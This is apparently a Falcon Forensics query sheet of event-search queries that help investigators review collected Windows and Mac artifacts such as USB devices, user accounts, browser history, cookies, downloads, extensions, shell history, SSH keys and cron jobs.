#event_simpleName=UsbDeviceInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | DeviceLastWriteTimeStamp := formatTime("%Y-%m-%d %H:%M:%S") | table([time, aid, ForensicsCollectionIdentifier, DeviceClassString, DeviceManufacturer, DeviceProduct, DevicePropertyPhysicalDeviceObjectName, VolumeDriveLetter, DevicePropertyFriendlyName, DeviceLastWriteTimeStamp, DeviceService, DeviceServiceDescription, DeviceHardwareVersion, DeviceTypeString, VolumeDeviceVendor], limit=max)

USNJournal

Show All Fields for USNRecord

#event_simpleName=USNRecord ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, USN, USNChangeReasons, FileAttributes, FileName, TargetFileName, FilePath, FileReferenceNumber, ParentFileReferenceNumber], limit=max)

Users

Show All Fields for UserIdentity

#event_simpleName=UserIdentity ForensicsCollectionIdentifier=* | LastLogonTime := parseTimeStamp(field=LastLogonTime, format=seconds) | LastLogonTime := formatTime("%F %T", field=LastLogonTime) | PasswordLastSet := parseTimeStamp(field=PasswordLastSet, format=seconds) | PasswordLastSet := formatTime("%F %T", field=PasswordLastSet) | table([aid, ForensicsCollectionIdentifier, LogonDomain, UserName, UserSystemComment, UserComment, LastLogonTime, AccountExpirationTime, AccountNeverExpires, PasswordLastSet, UserIsEnabled, UserIsAdmin, UserIsGuest, RemoteAccount, LogonCount, FailedLogonCount, UserSid, UserSidType, UserSidInfo, UserProfile, PrimaryDisplayName], limit=max)

Show all fields for UserAccountDeleted

#event_simpleName=UserAccountDeleted ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, UserName, UID, UserRealName])

List of Users by Count

#event_simpleName=UserIdentity ForensicsCollectionIdentifier=* | groupBy(UserName) | sort(_count)

Show Guest users who have been added to the local administrators group

#event_simpleName=UserIdentity ForensicsCollectionIdentifier=* UserIsGuest=1 UserIsAdmin=1 | LastLogonTime := parseTimeStamp(field=LastLogonTime, format=seconds) | LastLogonTime := formatTime("%F %T", field=LastLogonTime) | PasswordLastSet := parseTimeStamp(field=PasswordLastSet, format=seconds) | PasswordLastSet := formatTime("%F %T", field=PasswordLastSet) | table([aid, ForensicsCollectionIdentifier, UserName, LastLogonTime, AccountExpirationTime, AccountNeverExpires, PasswordLastSet, UserIsEnabled, UserIsAdmin, LogonCount, FailedLogonCount], limit=max)

Sort user logins by most recent

#event_simpleName=UserIdentity ForensicsCollectionIdentifier=* | LastLogonTime := parseTimeStamp(field=LastLogonTime, format=seconds) | LastLogonTime := formatTime("%F %T", field=LastLogonTime) | table([aid, ForensicsCollectionIdentifier, UserName, UserSystemComment, UserComment, LastLogonTime, UserIsEnabled, UserIsAdmin, UserIsGuest, RemoteAccount, LogonCount, FailedLogonCount, UserSid, UserSidType, UserSidInfo, UserProfile, PrimaryDisplayName], limit=max) | sort(LastLogonTime, order=asc)

Webshell

Show all fields for WebShellDetected

#event_simpleName=WebShellDetected ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FfcFileIdentifier, TargetFileName, FfcWebShellProbability, FfcPatternsTotalScore, FfcPatternsTotalHits, FfcPatternWithMostHits, ForensicsText], limit=max)

WMI

Show all fields for WmiQuery

#event_simpleName=WmiQuery #ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, WmiQuery, WmiNamespaceName, WmiQueryProperties, WmiQueryResult, WmiQueryStatus], limit=max)

WlanInterfaceInfo

#event_simpleName=WlanInterfaceInfo ForensicsCollectionIdentifier=*
| ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds)
| time := formatTime("%F %T", field=ContextTimeStamp)
| table([time, aid, ForensicsCollectionIdentifier, SSID, NetworkInterfaceGuid, Description, WlanProfileName, WlanFlags, Dot11BssType, Dot11AuthAlgorithm, Dot11CipherAlgorithm, BSSIDList, BSSIDCount, NetworkConnectable, WlanNotConnectableReason, WlanSignalQuality, RSSI, WlanInterfaceState, WlanSecurityEnabled], limit=max)

Yara

Show all fields for FfcBytePatternScanResult

#event_simpleName=FfcBytePatternScanResult ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FfcScanRuleName, TargetFileName, FfcFileIdentifier, TargetProcessId, MD5HashData, SHA1HashData, SHA256HashData], limit=max)

ZIP

Show all fields for ArchiveInfo

#event_simpleName=ArchiveInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, TargetFileName, FfcFileIdentifier, ArchiveType, Size, ArchiveEncryptionMethod, ArchiveCompressionMethod], limit=max)

Show all fields for ArchiveMemberInfo

#event_simpleName=FfcBytePatternScanResult ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, TargetFileName, FfcFileIdentifier, ArchiveUncompressedSize, ArchiveIndex, ArchiveFileName, Size, ArchiveCrc, MD5HashData, SHA1HashData, SHA256HashData], limit=max)

Falcon Forensics Query Sheet for Mac

Example queries to be used in advanced event search to investigate ingested Forensics data in Mac.

Tips for searches

These are examples of case sensitivity in searches.

HostName=Test only matches hosts named "Test"
HostName=/test/i matches test, Test, TeSt, or any similar combination

System

ForensicsCollectorOnline

Show all Fields

#event_simpleName = ForensicsCollectorOnline ForensicsCollectionIdentifier = * FfcPlatform= FFC_PLATFORM_DARWIN | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ComputerName, FfcPlatform, aid, cid, FfcCollectionId, FfcExecutableName, FfcExecutablePath, PhysicalAddress, LocalAddressIP4, LocalAddressIP6], limit=max)

ForensicsCollectorOffline

Show all Fields

#event_simpleName = ForensicsCollectorOffline ForensicsCollectionIdentifier = * FfcPlatform= FFC_PLATFORM_DARWIN | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ComputerName, FfcPlatform, aid, cid, FfcCollectionId, FfcExecutableName, FfcExecutablePath], limit=max)

ForensicsCollectorLog

Show all Fields

#event_simpleName = ForensicsCollectorLog ForensicsCollectionIdentifier = * | "Log Text" := rename(FfcCollectorLogText) | Module := rename(FfcModule) | "Log Level" := rename(FfcLogLevel) | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, id, "Log Level", Module, "Log Text"], limit=max)

AutorunProcessInfo

Show all Fields

#event_simpleName = AutoRunProcessInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, BundleID, CommandLineParameters, FfcAutoRunType, TargetFileName], limit=max)

Show Fields Matching CommandLineParameters

#event_simpleName = AutoRunProcessInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | CommandLineParameters = "PARAMETER" | table([time, aid, cid, ForensicsCollectionIdentifier, BundleID, CommandLineParameters, FfcAutoRunType, TargetFileName], limit=max)

Note: Replace PARAMETER with a parameter. PARAMETER is typically a path and globs can be used, such as /usr/libexec/*.

BrowserAccount

Show all Fields

#event_simpleName = BrowserAccountInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, BrowserAccountId, BrowserArtifactType, BrowserAccountEmail, BrowserAccountFullName, BrowserAccountGivenName, BrowserAccountEmailDomain, BrowserAccountIsSupervisedChild, BrowserAccountIsUnderAdvancedProtection, BrowserLocale, SourceFileName, UserName], limit=max)

Show browser accounts with common private email domain

#event_simpleName = BrowserAccountInfo ForensicsCollectionIdentifier = * | BrowserAccountEmail=*gmail.com OR BrowserAccountEmail=*hotmail.com OR BrowserAccountEmail=*yahoo.com OR BrowserAccountEmail=*outlook.com OR BrowserAccountEmail=*icloud.com | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, BrowserAccountId, BrowserArtifactType, BrowserAccountEmail, BrowserAccountFullName, BrowserAccountGivenName, BrowserAccountEmailDomain, BrowserAccountIsSupervisedChild, BrowserAccountIsUnderAdvancedProtection, BrowserLocale, SourceFileName, UserName], limit=max)

BrowserCookie

Show all Fields

#event_simpleName = BrowserCookieInfo ForensicsCollectionIdentifier = * | BrowserCookieLastAccessed := parseTimestamp(field="BrowserCookieLastAccessed", format=seconds) | BrowserCookieLastAccessed := formatTime(format="%F %T", field="BrowserCookieLastAccessed") | BrowserCookieExpiration := parseTimestamp(field="BrowserCookieExpiration", format=seconds) | BrowserCookieExpiration := formatTime(format="%F %T", field="BrowserCookieExpiration") | table([BrowserCookieLastAccessed, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserCookieHost, BrowserCookiePath, BrowserCookieExpiration, BrowserCookieIsHttpOnly, BrowserCookieIsSecure, SourceFileName, UserName], limit=max)

Show Fields Matching Browser

#event_simpleName = BrowserCookieInfo ForensicsCollectionIdentifier = * | BrowserCookieLastAccessed := parseTimestamp(field="BrowserCookieLastAccessed", format=seconds) | BrowserCookieLastAccessed := formatTime(format="%F %T", field="BrowserCookieLastAccessed") | BrowserCookieExpiration := parseTimestamp(field="BrowserCookieExpiration", format=seconds) | BrowserCookieExpiration := formatTime(format="%F %T", field="BrowserCookieExpiration") | BrowserName = BROWSERNAME | table([aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserCookieHost, BrowserCookiePath, BrowserCookieLastAccessed, BrowserCookieExpiration, BrowserCookieIsHttpOnly, BrowserCookieIsSecure, SourceFileName, UserName], limit=max)

Note: Replace BROWSERNAME with browser name, such as Safari, Firefox, Chrome. The BrowserName line can also be used in other queries to filter by browser.

Show cookies from a specific site

#event_simpleName = BrowserCookieInfo ForensicsCollectionIdentifier = * | BrowserCookieLastAccessed := parseTimestamp(field="BrowserCookieLastAccessed", format=seconds) | BrowserCookieLastAccessed := formatTime(format="%F %T", field="BrowserCookieLastAccessed") | BrowserCookieExpiration := parseTimestamp(field="BrowserCookieExpiration", format=seconds) | BrowserCookieExpiration := formatTime(format="%F %T", field="BrowserCookieExpiration") | BrowserCookieHost = <site of interest> | table([BrowserCookieLastAccessed, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserCookieHost, BrowserCookiePath, BrowserCookieExpiration, BrowserCookieIsHttpOnly, BrowserCookieIsSecure, SourceFileName, UserName], limit=max)

Note: Replace with site name. You can use wildcards such as "*google.com".

BrowserDownloadStarted

Show all Fields

#event_simpleName=BrowserDownloadStarted | ContextTimeStamp := parseTimestamp(field="ContextTimeStamp", format=seconds) | time := formatTime(format="%F %T", field="ContextTimeStamp") | table([time, aid, ForensicsCollectionIdentifier, UserName, BrowserName, BrowserArtifactType, Url, Size, TargetFileName, SourceFileName, BrowserDownloadLastAccessed, BrowserDownloadFileDangerType, BrowserDownloadFileInterruptReason, MimeType, BrowserDownloadFileState, BrowserDownloadFileOpened, BrowserDownloadSiteUrl, BrowserTabDownLoadLinkUrl, BrowserTabDownLoadOriginalReferrerUrl, ReferrerUrl, SourceAccountDomain], limit=max)

Show Fields Matching Browser

#event_simpleName = BrowserDownloadStarted ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | BrowserName = BROWSERNAME | table([time, aid, cid, ForensiceCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserDownloadFileState, Id, TargetFileName, Size, BrowserDownloadFileDangerType, BrowserDownloadFileInterruptReason, BrowserDownloadSiteUrl, BrowserDownloadFileOpened, BrowserTabDownLoadLinkUrl, BrowserTabDownLoadOriginalReferrerUrl, ReferrerUrl, SourceAccountDomain, SourceFileName, UserName], limit=max)

Note: Replace BROWSERNAME with browser name, such as Safari, Firefox, Chrome.

Show downloaded files from a specific site

#event_simpleName = BrowserDownloadStarted ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | BrowserDownloadSiteUrl = * | table([time, aid, cid, ForensiceCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserDownloadFileState, Id, TargetFileName, Size, BrowserDownloadFileDangerType, BrowserDownloadFileInterruptReason, BrowserDownloadSiteUrl, BrowserDownloadFileOpened, BrowserTabDownLoadLinkUrl, BrowserTabDownLoadOriginalReferrerUrl, ReferrerUrl, SourceAccountDomain, SourceFileName, UserName], limit=max)

Show abnormally large files

#event_simpleName = BrowserDownloadStarted ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | Size > <fill in bytes here> | table([time, aid, cid, ForensiceCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserDownloadFileState, , Id, TargetFileName, Size, BrowserDownloadFileDangerType, BrowserDownloadFileInterruptReason, BrowserDownloadSiteUrl, BrowserDownloadFileOpened, BrowserTabDownLoadLinkUrl, BrowserTabDownLoadOriginalReferrerUrl, ReferrerUrl, SourceAccountDomain, SourceFileName, UserName], limit=max)

Note: Change with the number of bytes you're looking for.

BrowserDownloadEnd

Show all Fields

#event_simpleName = BrowserDownloadEnded ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensiceCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserDownloadFileState, Id, TargetFileName, Size, BrowserDownloadFileDangerType, BrowserDownloadFileInterruptReason, BrowserDownloadSiteUrl, BrowserDownloadFileOpened, BrowserTabDownLoadLinkUrl, BrowserTabDownLoadOriginalReferrerUrl, ReferrerUrl, SourceAccountDomain, SourceFileName, UserName], limit=max)

Show Fields Matching Browser

#event_simpleName = BrowserDownloadEnded ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | BrowserName = BROWSERNAME | table([time, aid, cid, ForensiceCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserDownloadFileState, Id, TargetFileName, Size, BrowserDownloadFileDangerType, BrowserDownloadFileInterruptReason, BrowserDownloadSiteUrl, BrowserDownloadFileOpened, BrowserTabDownLoadLinkUrl, BrowserTabDownLoadOriginalReferrerUrl, ReferrerUrl, SourceAccountDomain, SourceFileName, UserName], limit=max)

Note: Replace BROWSERNAME with browser name, such as Safari, Firefox, Chrome.

Show downloaded files from a specific site

#event_simpleName = BrowserDownloadEnded ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | BrowserDownloadSiteUrl = * | table([time, aid, cid, ForensiceCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserDownloadFileState, Id, TargetFileName, Size, BrowserDownloadFileDangerType, BrowserDownloadFileInterruptReason, BrowserDownloadSiteUrl, BrowserDownloadFileOpened, BrowserTabDownLoadLinkUrl, BrowserTabDownLoadOriginalReferrerUrl, ReferrerUrl, SourceAccountDomain, SourceFileName, UserName], limit=max)

Show abnormally large files

#event_simpleName = BrowserDownloadEnded ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | Size > <fill in bytes here> | table([time, aid, cid, ForensiceCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserDownloadFileState, Id, TargetFileName, Size, BrowserDownloadFileDangerType, BrowserDownloadFileInterruptReason, BrowserDownloadSiteUrl, BrowserDownloadFileOpened, BrowserTabDownLoadLinkUrl, BrowserTabDownLoadOriginalReferrerUrl, ReferrerUrl, SourceAccountDomain, SourceFileName, UserName], limit=max)

BrowserExtensionInfo

Show all Fields

#event_simpleName = BrowserExtensionInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) |table([time, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserExtensionId, BrowserExtensionName, SourceFileName, UserName], limit=max)

Show Fields Matching Browser

#event_simpleName = BrowserExtensionInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | BrowserName = BROWSERNAME | table([time, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserExtensionId, BrowserExtensionName, SourceFileName, UserName], limit=max)

Note: Replace BROWSERNAME with browser name, such as Safari, Firefox, Chrome.

Show if extension of interest is installed

#event_simpleName = BrowserExtensionInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | BrowserExtensionName = <Extension Name> |table([time, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserExtensionId, BrowserExtensionName, SourceFileName, UserName], limit=max)

BrowserHistoryVisit

Show all Fields

#event_simpleName=BrowserHistoryVisit ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, UserName, BrowserName, BrowserArtifactType, Url, Title, BrowserVisitCount, BrowserUrlTypedCount, BrowserVisitType, Id, BrowserRedirectSourceTableEntry, BrowserRedirectDesitnationTableEntry, BrowserVisitTableId, SourceAccountDomain, UrlLastModifiedTimeStamp], limit=max)

Show Fields Matching Browser

#event_simpleName=BrowserHistoryVisit ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | BrowserName = BROWSERNAME | table([time, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, Id, Title, Url, BrowserUrlTypedCount, BrowserVisitCount, BrowserVisitType, BrowserRedirectSourceTableEntry, BrowserRedirectDestinationTableEntry, BrowserVisitTableId, SourceAccountDomain, UrlLastAccessedTimestamp, UrlLastMOdifiedTimeStamp, SourceFileName, UserName], limit=max)

Note: Replace BROWSERNAME with browser name, such as Safari, Firefox, Chrome.

Show sites that were manually navigated to (TYPED)

#event_simpleName = BrowserHistoryVisit ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | BrowserVisitType = TYPED | table([time, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, Id, Title, Url, BrowserUrlTypedCount, BrowserVisitCount, BrowserVisitType, BrowserRedirectSourceTableEntry, BrowserRedirectDestinationTableEntry, BrowserVisitTableId, SourceAccountDomain, UrlLastAccessedTimestamp, UrlLastMOdifiedTimeStamp, SourceFileName, UserName], limit=max)

Show visits to a specific URL

#event_simpleName = BrowserHistoryVisit ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | Url = URL | table([time, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, Id, Title, Url, BrowserUrlTypedCount, BrowserVisitCount, BrowserVisitType, BrowserRedirectSourceTableEntry, BrowserRedirectDestinationTableEntry, BrowserVisitTableId, SourceAccountDomain, UrlLastAccessedTimestamp, UrlLastMOdifiedTimeStamp, SourceFileName, UserName], limit=max)

BrowserHistoryClearInfo

Show all Fields

#event_simpleName = BrowserHistoryClearInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) |table([time, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserClearedDataPeriodBasic, BrowserClearedDataPeriodAdvanced, BrowserClearedDataCookiesBasic, BrowserClearedDataCookiesAdvanced, BrowserClearedFormData, BrowserClearedHostedAppsData, BrowserClearedPasswords, BrowserCLearedSiteSettings, SourceFileName, UserName], limit=max)

BrowserProxy

Show all Fields

#event_simpleName = BrowserProxyInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserProxyType, BrowserProxyUrlHttp, BrowserProxyPortHttp, BrowserProxyUrlSsl, BrowserProxyPortSsl, BrowserProxyPacUrl, BrowserProxyAllowlist, BrowserProxyShare, SourceFileName, UserName], limit=max)

Show manually set proxy settings

#event_simpleName = BrowserProxyInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | BrowserProxyType = MANUAL_PROXY | table([time, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserProxyType, BrowserProxyUrlHttp, BrowserProxyPortHttp, BrowserProxyUrlSsl, BrowserProxyPortSsl, BrowserProxyPacUrl, BrowserProxyAllowlist, BrowserProxyShare, SourceFileName, UserName], limit=max)

Entropy

Show all fields for EntropyScan

#event_simpleName=EntropyScan ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, TargetFileName, FileIdentifier, BytesScanned, ShannonEntropy, AverageWordLength, AverageLineLength, MaxLineLength, WhitespaceRatio, SpecialCharactersRatio], limit=max)

EnvVars

Show all Fields

#event_simpleName=RuntimeEnvironmentVariable ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, EnvironmentVariableName, EnvironmentVariableValue], limit=max)

EventTapInfo

Show all Fields

#event_simpleName = EventTapInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicCollectionIdentifier, SourceProcessId, TargetProcessId, EventTapId, EventTapEventsOfInterest, EventTapIsEnabled, EventTapOptions, EventTapPoint, name], limit=max)

Search By Large Event Tap Events of Interest

#event_simpleName = EventTapInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | EventTapEventsOfInterest = NUMBEREVENTS | table([time, aid, cid, ForensicCollectionIdentifier, SourceProcessId, TargetProcessId, EventTapId, EventTapEventsOfInterest, EventTapIsEnabled, EventTapOptions, EventTapPoint], limit=max)

Note: Replace NUMBEREVENTS with number of events.

FileEntry

Show all Fields

#event_simpleName=FileEntry ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, FileEntrySourceType, TargetFileName, Line, Length, ForensicsText, FfcLogFilterTag], limit=max)

Reassemble files by line

#event_simpleName=FileEntry ForensicsCollectionIdentifier= * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FileEntrySourceType, TargetFileName, Line, Length, ForensicsText, FfcLogFilterTag], limit=max) | sort([TargetFileName, Line], order=asc, limit=max)

Note: Replace with the collection ID you're investigating.

Shell history

#event_simpleName=FileEntry ForensicsCollectionIdentifier= * FileEntrySourceType=FILE_SHELL_HISTORY | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, FileEntrySourceType, TargetFileName, Line, Length, ForensicsText, FfcLogFilterTag], limit=max)

SSH configs

#event_simpleName=FileEntry ForensicsCollectionIdentifier= * FileEntrySourceType=FILE_SSH_CONFIG | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, FileEntrySourceType, TargetFileName, Line, Length, ForensicsText, FfcLogFilterTag], limit=max)

Known hosts

#event_simpleName=FileEntry ForensicsCollectionIdentifier= * FileEntrySourceType=FILE_KNOWN_HOSTS | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, FileEntrySourceType, TargetFileName, Line, Length, ForensicsText, FfcLogFilterTag], limit=max)

Shell configs

#event_simpleName=FileEntry ForensicsCollectionIdentifier= * FileEntrySourceType=FILE_SHELL_CONFIG | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, FileEntrySourceType, TargetFileName, Line, Length, ForensicsText, FfcLogFilterTag], limit=max)

Authorized keys

#event_simpleName=FileEntry ForensicsCollectionIdentifier= * FileEntrySourceType=FILE_AUTHORIZED_KEYS | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, FileEntrySourceType, TargetFileName, Line, Length, ForensicsText, FfcLogFilterTag], limit=max)

Cron jobs

#event_simpleName=FileEntry ForensicsCollectionIdentifier= * FileEntrySourceType=FILE_SCHEDULED | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, FileEntrySourceType, TargetFileName, Line, Length, ForensicsText, FfcLogFilterTag], limit=max)

System start configs

#event_simpleName=FileEntry ForensicsCollectionIdentifier= * FileEntrySourceType=FILE_SYSTEM_START | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, FileEntrySourceType, TargetFileName, Line, Length, ForensicsText, FfcLogFilterTag], limit=max)

System configs

#event_simpleName=FileEntry ForensicsCollectionIdentifier= * FileEntrySourceType=FILE_SYSTEM_CONFIG | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, FileEntrySourceType, TargetFileName, Line, Length, ForensicsText, FfcLogFilterTag], limit=max)

System stop configs

#event_simpleName=FileEntry ForensicsCollectionIdentifier= * FileEntrySourceType=FILE_SYSTEM_STOP | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, FileEntrySourceType, TargetFileName, Line, Length, ForensicsText, FfcLogFilterTag], limit=max)

Kernel modules

#event_simpleName=FileEntry ForensicsCollectionIdentifier= * FileEntrySourceType=FILE_KERN_MODULES | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, FileEntrySourceType, TargetFileName, Line, Length, ForensicsText, FfcLogFilterTag], limit=max)

FileTimestampMetadata

Show all Fields

#event_simpleName=FileTimestampMetadata ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, FfcFileChangeType, FfcFileIdentifier, PosixFileType, TargetFileName, aid, cid, ForensicsCollectionIdentifier], limit=max)

FileInfo

Show all Fields

